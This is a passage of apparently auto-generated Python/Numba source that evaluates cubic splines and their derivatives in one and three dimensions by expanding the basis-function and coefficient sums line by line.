Phi1_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t1 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi1_0 = (
_Ad[0, 0] * tp1_0
+ _Ad[0, 1] * tp1_1
+ _Ad[0, 2] * tp1_2
+ _Ad[0, 3] * tp1_3
)
Phi1_1 = (
_Ad[1, 0] * tp1_0
+ _Ad[1, 1] * tp1_1
+ _Ad[1, 2] * tp1_2
+ _Ad[1, 3] * tp1_3
)
Phi1_2 = (
_Ad[2, 0] * tp1_0
+ _Ad[2, 1] * tp1_1
+ _Ad[2, 2] * tp1_2
+ _Ad[2, 3] * tp1_3
)
Phi1_3 = (
_Ad[3, 0] * tp1_0
+ _Ad[3, 1] * tp1_1
+ _Ad[3, 2] * tp1_2
+ _Ad[3, 3] * tp1_3
)
Phi2_0 = 0
Phi2_1 = 0
Phi2_2 = 0
Phi2_3 = 0
if t2 < 0:
Phi2_0 = _dAd[0, 3] * t2 + _Ad[0, 3]
Phi2_1 = _dAd[1, 3] * t2 + _Ad[1, 3]
Phi2_2 = _dAd[2, 3] * t2 + _Ad[2, 3]
Phi2_3 = _dAd[3, 3] * t2 + _Ad[3, 3]
elif t2 > 1:
Phi2_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t2 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi2_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t2 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi2_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t2 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi2_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t2 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi2_0 = (
_Ad[0, 0] * tp2_0
+ _Ad[0, 1] * tp2_1
+ _Ad[0, 2] * tp2_2
+ _Ad[0, 3] * tp2_3
)
Phi2_1 = (
_Ad[1, 0] * tp2_0
+ _Ad[1, 1] * tp2_1
+ _Ad[1, 2] * tp2_2
+ _Ad[1, 3] * tp2_3
)
Phi2_2 = (
_Ad[2, 0] * tp2_0
+ _Ad[2, 1] * tp2_1
+ _Ad[2, 2] * tp2_2
+ _Ad[2, 3] * tp2_3
)
Phi2_3 = (
_Ad[3, 0] * tp2_0
+ _Ad[3, 1] * tp2_1
+ _Ad[3, 2] * tp2_2
+ _Ad[3, 3] * tp2_3
)
out[n] = (
Phi0_0
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3])
)
)
+ Phi0_1
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3])
)
)
+ Phi0_2
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3])
)
)
+ Phi0_3
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3])
)
)
)
@njit(cache=True)
def vec_eval_cubic_splines_G_1(a, b, orders, coefs, points, vals, dvals):
# n_vals = coefs.shape[1]
N = points.shape[0]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
for n in range(N):
x0 = points[n, 0]
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
dPhi0_0 = (
_dAd[0, 0] * tp0_0
+ _dAd[0, 1] * tp0_1
+ _dAd[0, 2] * tp0_2
+ _dAd[0, 3] * tp0_3
) * dinv0
dPhi0_1 = (
_dAd[1, 0] * tp0_0
+ _dAd[1, 1] * tp0_1
+ _dAd[1, 2] * tp0_2
+ _dAd[1, 3] * tp0_3
) * dinv0
dPhi0_2 = (
_dAd[2, 0] * tp0_0
+ _dAd[2, 1] * tp0_1
+ _dAd[2, 2] * tp0_2
+ _dAd[2, 3] * tp0_3
) * dinv0
dPhi0_3 = (
_dAd[3, 0] * tp0_0
+ _dAd[3, 1] * tp0_1
+ _dAd[3, 2] * tp0_2
+ _dAd[3, 3] * tp0_3
) * dinv0
vals[n, 0] = (
Phi0_0 * (coefs[i0 + 0])
+ Phi0_1 * (coefs[i0 + 1])
+ Phi0_2 * (coefs[i0 + 2])
+ Phi0_3 * (coefs[i0 + 3])
)
dvals[n, 0, 0] = (
dPhi0_0 * (coefs[i0 + 0])
+ dPhi0_1 * (coefs[i0 + 1])
+ dPhi0_2 * (coefs[i0 + 2])
+ dPhi0_3 * (coefs[i0 + 3])
)
    # note: these assignments only rebind local names inside the jitted
    # function; the caller still sees the vals / dvals arrays filled above
    vals = vals[:, 0]
    dvals = dvals[:, :, 0]
@njit(cache=True)
def vec_eval_cubic_splines_G_3(a, b, orders, coefs, points, vals, dvals):
coefs = np.expand_dims(coefs, 3)
n_vals = coefs.shape[-1]
N = points.shape[0]
M0 = orders[0]
start0 = a[0]
dinv0 = (orders[0] - 1.0) / (b[0] - a[0])
M1 = orders[1]
start1 = a[1]
dinv1 = (orders[1] - 1.0) / (b[1] - a[1])
M2 = orders[2]
start2 = a[2]
dinv2 = (orders[2] - 1.0) / (b[2] - a[2])
for n in range(N):
x0 = points[n, 0]
x1 = points[n, 1]
x2 = points[n, 2]
u0 = (x0 - start0) * dinv0
i0 = int(floor(u0))
i0 = max(min(i0, M0 - 2), 0)
t0 = u0 - i0
u1 = (x1 - start1) * dinv1
i1 = int(floor(u1))
i1 = max(min(i1, M1 - 2), 0)
t1 = u1 - i1
u2 = (x2 - start2) * dinv2
i2 = int(floor(u2))
i2 = max(min(i2, M2 - 2), 0)
t2 = u2 - i2
tp0_0 = t0 * t0 * t0
tp0_1 = t0 * t0
tp0_2 = t0
tp0_3 = 1.0
tp1_0 = t1 * t1 * t1
tp1_1 = t1 * t1
tp1_2 = t1
tp1_3 = 1.0
tp2_0 = t2 * t2 * t2
tp2_1 = t2 * t2
tp2_2 = t2
tp2_3 = 1.0
Phi0_0 = 0
Phi0_1 = 0
Phi0_2 = 0
Phi0_3 = 0
if t0 < 0:
Phi0_0 = _dAd[0, 3] * t0 + _Ad[0, 3]
Phi0_1 = _dAd[1, 3] * t0 + _Ad[1, 3]
Phi0_2 = _dAd[2, 3] * t0 + _Ad[2, 3]
Phi0_3 = _dAd[3, 3] * t0 + _Ad[3, 3]
elif t0 > 1:
Phi0_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t0 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi0_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t0 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi0_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t0 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi0_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t0 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi0_0 = (
_Ad[0, 0] * tp0_0
+ _Ad[0, 1] * tp0_1
+ _Ad[0, 2] * tp0_2
+ _Ad[0, 3] * tp0_3
)
Phi0_1 = (
_Ad[1, 0] * tp0_0
+ _Ad[1, 1] * tp0_1
+ _Ad[1, 2] * tp0_2
+ _Ad[1, 3] * tp0_3
)
Phi0_2 = (
_Ad[2, 0] * tp0_0
+ _Ad[2, 1] * tp0_1
+ _Ad[2, 2] * tp0_2
+ _Ad[2, 3] * tp0_3
)
Phi0_3 = (
_Ad[3, 0] * tp0_0
+ _Ad[3, 1] * tp0_1
+ _Ad[3, 2] * tp0_2
+ _Ad[3, 3] * tp0_3
)
Phi1_0 = 0
Phi1_1 = 0
Phi1_2 = 0
Phi1_3 = 0
if t1 < 0:
Phi1_0 = _dAd[0, 3] * t1 + _Ad[0, 3]
Phi1_1 = _dAd[1, 3] * t1 + _Ad[1, 3]
Phi1_2 = _dAd[2, 3] * t1 + _Ad[2, 3]
Phi1_3 = _dAd[3, 3] * t1 + _Ad[3, 3]
elif t1 > 1:
Phi1_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t1 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi1_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t1 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi1_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t1 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi1_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t1 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi1_0 = (
_Ad[0, 0] * tp1_0
+ _Ad[0, 1] * tp1_1
+ _Ad[0, 2] * tp1_2
+ _Ad[0, 3] * tp1_3
)
Phi1_1 = (
_Ad[1, 0] * tp1_0
+ _Ad[1, 1] * tp1_1
+ _Ad[1, 2] * tp1_2
+ _Ad[1, 3] * tp1_3
)
Phi1_2 = (
_Ad[2, 0] * tp1_0
+ _Ad[2, 1] * tp1_1
+ _Ad[2, 2] * tp1_2
+ _Ad[2, 3] * tp1_3
)
Phi1_3 = (
_Ad[3, 0] * tp1_0
+ _Ad[3, 1] * tp1_1
+ _Ad[3, 2] * tp1_2
+ _Ad[3, 3] * tp1_3
)
Phi2_0 = 0
Phi2_1 = 0
Phi2_2 = 0
Phi2_3 = 0
if t2 < 0:
Phi2_0 = _dAd[0, 3] * t2 + _Ad[0, 3]
Phi2_1 = _dAd[1, 3] * t2 + _Ad[1, 3]
Phi2_2 = _dAd[2, 3] * t2 + _Ad[2, 3]
Phi2_3 = _dAd[3, 3] * t2 + _Ad[3, 3]
elif t2 > 1:
Phi2_0 = (3 * _Ad[0, 0] + 2 * _Ad[0, 1] + _Ad[0, 2]) * (t2 - 1) + (
_Ad[0, 0] + _Ad[0, 1] + _Ad[0, 2] + _Ad[0, 3]
)
Phi2_1 = (3 * _Ad[1, 0] + 2 * _Ad[1, 1] + _Ad[1, 2]) * (t2 - 1) + (
_Ad[1, 0] + _Ad[1, 1] + _Ad[1, 2] + _Ad[1, 3]
)
Phi2_2 = (3 * _Ad[2, 0] + 2 * _Ad[2, 1] + _Ad[2, 2]) * (t2 - 1) + (
_Ad[2, 0] + _Ad[2, 1] + _Ad[2, 2] + _Ad[2, 3]
)
Phi2_3 = (3 * _Ad[3, 0] + 2 * _Ad[3, 1] + _Ad[3, 2]) * (t2 - 1) + (
_Ad[3, 0] + _Ad[3, 1] + _Ad[3, 2] + _Ad[3, 3]
)
else:
Phi2_0 = (
_Ad[0, 0] * tp2_0
+ _Ad[0, 1] * tp2_1
+ _Ad[0, 2] * tp2_2
+ _Ad[0, 3] * tp2_3
)
Phi2_1 = (
_Ad[1, 0] * tp2_0
+ _Ad[1, 1] * tp2_1
+ _Ad[1, 2] * tp2_2
+ _Ad[1, 3] * tp2_3
)
Phi2_2 = (
_Ad[2, 0] * tp2_0
+ _Ad[2, 1] * tp2_1
+ _Ad[2, 2] * tp2_2
+ _Ad[2, 3] * tp2_3
)
Phi2_3 = (
_Ad[3, 0] * tp2_0
+ _Ad[3, 1] * tp2_1
+ _Ad[3, 2] * tp2_2
+ _Ad[3, 3] * tp2_3
)
dPhi0_0 = (
_dAd[0, 0] * tp0_0
+ _dAd[0, 1] * tp0_1
+ _dAd[0, 2] * tp0_2
+ _dAd[0, 3] * tp0_3
) * dinv0
dPhi0_1 = (
_dAd[1, 0] * tp0_0
+ _dAd[1, 1] * tp0_1
+ _dAd[1, 2] * tp0_2
+ _dAd[1, 3] * tp0_3
) * dinv0
dPhi0_2 = (
_dAd[2, 0] * tp0_0
+ _dAd[2, 1] * tp0_1
+ _dAd[2, 2] * tp0_2
+ _dAd[2, 3] * tp0_3
) * dinv0
dPhi0_3 = (
_dAd[3, 0] * tp0_0
+ _dAd[3, 1] * tp0_1
+ _dAd[3, 2] * tp0_2
+ _dAd[3, 3] * tp0_3
) * dinv0
dPhi1_0 = (
_dAd[0, 0] * tp1_0
+ _dAd[0, 1] * tp1_1
+ _dAd[0, 2] * tp1_2
+ _dAd[0, 3] * tp1_3
) * dinv1
dPhi1_1 = (
_dAd[1, 0] * tp1_0
+ _dAd[1, 1] * tp1_1
+ _dAd[1, 2] * tp1_2
+ _dAd[1, 3] * tp1_3
) * dinv1
dPhi1_2 = (
_dAd[2, 0] * tp1_0
+ _dAd[2, 1] * tp1_1
+ _dAd[2, 2] * tp1_2
+ _dAd[2, 3] * tp1_3
) * dinv1
dPhi1_3 = (
_dAd[3, 0] * tp1_0
+ _dAd[3, 1] * tp1_1
+ _dAd[3, 2] * tp1_2
+ _dAd[3, 3] * tp1_3
) * dinv1
dPhi2_0 = (
_dAd[0, 0] * tp2_0
+ _dAd[0, 1] * tp2_1
+ _dAd[0, 2] * tp2_2
+ _dAd[0, 3] * tp2_3
) * dinv2
dPhi2_1 = (
_dAd[1, 0] * tp2_0
+ _dAd[1, 1] * tp2_1
+ _dAd[1, 2] * tp2_2
+ _dAd[1, 3] * tp2_3
) * dinv2
dPhi2_2 = (
_dAd[2, 0] * tp2_0
+ _dAd[2, 1] * tp2_1
+ _dAd[2, 2] * tp2_2
+ _dAd[2, 3] * tp2_3
) * dinv2
dPhi2_3 = (
_dAd[3, 0] * tp2_0
+ _dAd[3, 1] * tp2_1
+ _dAd[3, 2] * tp2_2
+ _dAd[3, 3] * tp2_3
) * dinv2
for k in range(n_vals):
vals[n, k] = (
Phi0_0
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3, k])
)
)
+ Phi0_1
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3, k])
)
)
+ Phi0_2
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 2, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 2, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 3, i2 + 3, k])
)
)
+ Phi0_3
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 3, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 3, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 3, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 3, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 3, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 3, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 3, i1 + 3, i2 + 3, k])
)
)
)
dvals[n, 0, k] = (
dPhi0_0
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3, k])
)
)
+ dPhi0_1
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3, k])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3, k])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3, k])
)
)
+ dPhi0_2
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0, k])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1, k])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2, k])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3, k])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0, k])
